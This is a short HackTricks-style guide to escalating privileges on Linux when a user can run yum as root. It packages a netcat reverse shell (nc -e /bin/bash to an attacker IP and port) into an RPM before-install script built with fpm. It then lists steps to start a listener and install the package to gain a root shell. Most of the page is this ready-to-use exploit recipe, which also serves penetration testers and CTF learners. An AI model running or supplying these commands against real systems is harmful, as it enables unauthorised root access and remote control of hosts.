hacktricks/linux-unix/privilege-escalation/exploiting-yum.md

Exploiting Yum

Further examples around yum can also be found on gtfobins.

Executing arbitrary commands via RPM Packages

Checking the Environment

In order to leverage this vector the user must be able to execute yum commands as a higher privileged user, i.e. root.

A working example of this vector

A working example of this exploit can be found in the daily bugle room on tryhackme.

Packing an RPM

In the following section, I will cover packaging a reverse shell into an RPM using fpm.

The example below creates a package that includes a before-install trigger with an arbitrary script that can be defined by the attacker. When installed, this package will execute the arbitrary command. I've used a simple reverse netcat shell example for demonstration but this can be changed as necessary.

EXPLOITDIR=$(mktemp -d)
CMD='nc -e /bin/bash <ATTACKER IP> <PORT>'
RPMNAME="exploited"
echo $CMD > $EXPLOITDIR/beforeinstall.sh
fpm -n $RPMNAME -s dir -t rpm -a all --before-install $EXPLOITDIR/beforeinstall.sh $EXPLOITDIR

Catching a shell

Using the above example and assuming yum can be executed as a higher-privileged user.

1. Transfer the rpm to the host
2. Start a listener on your local host such as the example netcat listener
3. Install the vulnerable package yum localinstall -y exploited-1.0-1.noarch.rpm